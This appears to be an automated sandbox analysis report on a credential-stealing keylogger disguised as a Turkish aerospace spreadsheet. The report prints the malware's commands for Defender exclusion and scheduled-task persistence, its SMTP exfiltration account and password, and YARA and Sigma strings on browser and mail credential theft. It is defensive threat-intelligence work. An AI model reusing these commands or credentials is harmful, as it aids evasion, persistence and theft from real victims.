Edit tour

Windows Analysis Report
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Overview

General Information

Sample name:	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe renamed because original name is a hash value
Original sample name:	TEKLF STE - TUSA TRK HAVACILIK UZAY SANAY_xlsx.exe
Analysis ID:	1590703
MD5:	c9c012589d85d3610541a5c7377d5ac9
SHA1:	bc89c09faa26ca0f12ff6fb08d6f8e4129f1a8cc
SHA256:	800f9ec3e0b17084a4479e88fcc9089418ebd621531d1aee2eefbed5622a69b4
Tags:	exeuser-Racco42
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe (PID: 2248 cmdline: "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe" MD5: C9C012589D85D3610541A5C7377D5AC9)

powershell.exe (PID: 6184 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5128 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 6216 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2036 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp24B8.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe (PID: 5964 cmdline: "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe" MD5: C9C012589D85D3610541A5C7377D5AC9)

TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe (PID: 5728 cmdline: "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe" MD5: C9C012589D85D3610541A5C7377D5AC9)

xSjByRHuwGV.exe (PID: 1936 cmdline: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe MD5: C9C012589D85D3610541A5C7377D5AC9)

schtasks.exe (PID: 3420 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp387E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

xSjByRHuwGV.exe (PID: 5560 cmdline: "C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe" MD5: C9C012589D85D3610541A5C7377D5AC9)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2183125606.0000000004109000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2186688831.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.3384233023.0000000003041000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.2231819209.00000000044ED000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e650:$a1: get_encryptedPassword 0x2ebd8:$a2: get_encryptedUsername 0x2e2c3:$a3: get_timePasswordChanged 0x2e3da:$a4: get_passwordField 0x2e666:$a5: set_encryptedPassword 0x31382:$a6: get_passwords 0x31716:$a7: get_logins 0x3136e:$a8: GetOutlookPasswords 0x30d27:$a9: StartKeylogger 0x3166f:$a10: KeyLoggerEventArgs 0x30dc7:$a11: KeyLoggerEventArgsEventHandler
0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000002.3379471851.000000000042F000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xaa0:$a1: get_encryptedPassword 0x1028:$a2: get_encryptedUsername 0x713:$a3: get_timePasswordChanged 0x82a:$a4: get_passwordField 0xab6:$a5: set_encryptedPassword 0x37d2:$a6: get_passwords 0x3b66:$a7: get_logins 0x37be:$a8: GetOutlookPasswords 0x3177:$a9: StartKeylogger 0x3abf:$a10: KeyLoggerEventArgs 0x3217:$a11: KeyLoggerEventArgsEventHandler
0000000F.00000002.3379471851.0000000000437000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2226842794.000000000342A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.3385197213.0000000003071000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2182151240.00000000031BA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dcd0:$a1: get_encryptedPassword 0x10c150:$a1: get_encryptedPassword 0x14ef70:$a1: get_encryptedPassword 0x2e258:$a2: get_encryptedUsername 0x10c6d8:$a2: get_encryptedUsername 0x14f4f8:$a2: get_encryptedUsername 0x2d943:$a3: get_timePasswordChanged 0x10bdc3:$a3: get_timePasswordChanged 0x14ebe3:$a3: get_timePasswordChanged 0x2da5a:$a4: get_passwordField 0x10beda:$a4: get_passwordField 0x14ecfa:$a4: get_passwordField 0x2dce6:$a5: set_encryptedPassword 0x10c166:$a5: set_encryptedPassword 0x14ef86:$a5: set_encryptedPassword 0x30a02:$a6: get_passwords 0x10ee82:$a6: get_passwords 0x151ca2:$a6: get_passwords 0x30d96:$a7: get_logins 0x10f216:$a7: get_logins 0x152036:$a7: get_logins
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2248	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2248	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2248	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 2248	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xa8035:$a1: get_encryptedPassword 0xa85b3:$a2: get_encryptedUsername 0xa7cb7:$a3: get_timePasswordChanged 0xa7dce:$a4: get_passwordField 0xa804b:$a5: set_encryptedPassword 0xaad0f:$a6: get_passwords 0xab09f:$a7: get_logins 0xaacfb:$a8: GetOutlookPasswords 0xaa6b4:$a9: StartKeylogger 0xaaff8:$a10: KeyLoggerEventArgs 0xaa754:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 5728	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 5728	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: xSjByRHuwGV.exe PID: 1936	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: xSjByRHuwGV.exe PID: 1936	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: xSjByRHuwGV.exe PID: 1936	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: xSjByRHuwGV.exe PID: 1936	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: xSjByRHuwGV.exe PID: 1936	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4c7b7:$a1: get_encryptedPassword 0x4cd35:$a2: get_encryptedUsername 0x4c439:$a3: get_timePasswordChanged 0x4c550:$a4: get_passwordField 0x4c7cd:$a5: set_encryptedPassword 0x4f491:$a6: get_passwords 0x4f821:$a7: get_logins 0x4f47d:$a8: GetOutlookPasswords 0x4ee36:$a9: StartKeylogger 0x4f77a:$a10: KeyLoggerEventArgs 0x4eed6:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: xSjByRHuwGV.exe PID: 5560	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: xSjByRHuwGV.exe PID: 5560	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: xSjByRHuwGV.exe PID: 5560	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: xSjByRHuwGV.exe PID: 5560	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbc87f:$a1: get_encryptedPassword 0xbcdfd:$a2: get_encryptedUsername 0xbc501:$a3: get_timePasswordChanged 0xbc618:$a4: get_passwordField 0xbc895:$a5: set_encryptedPassword 0xbf559:$a6: get_passwords 0xbf8e9:$a7: get_logins 0xbf545:$a8: GetOutlookPasswords 0xbeefe:$a9: StartKeylogger 0xbf842:$a10: KeyLoggerEventArgs 0xbef9e:$a11: KeyLoggerEventArgsEventHandler
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.5b90000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.xSjByRHuwGV.exe.3764638.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.5b90000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.34f4cac.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.xSjByRHuwGV.exe.3764638.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.34f4cac.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
11.2.xSjByRHuwGV.exe.44ed9b0.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data
11.2.xSjByRHuwGV.exe.44ed9b0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
11.2.xSjByRHuwGV.exe.3542808.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.32d2e7c.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70ac0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71048:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70733:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x7084a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70ad6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x737f2:$a6: get_passwords 0x30d66:$a7: get_logins 0x73b86:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x737de:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x73197:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x73adf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e0ae:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d751:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x7d9ae:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data 0x7e38d:$a5: \Kometa\User Data\Default\Login Data
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.435a4b0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x71e84:$s1: UnHook 0x2f06b:$s2: SetHook 0x71e8b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x71e93:$s3: CallNextHook 0x2f080:$s4: _hook 0x71ea0:$s4: _hook
Click to see the 29 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe", ParentImage: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, ParentProcessId: 2248, ParentProcessName: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe", ProcessId: 6184, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp387E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp387E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe, ParentImage: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe, ParentProcessId: 1936, ParentProcessName: xSjByRHuwGV.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xSjByRHuwGV" /XML "C:\Users\user\AppData\Local\Temp\tmp387E.tmp", ProcessId: 3420, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

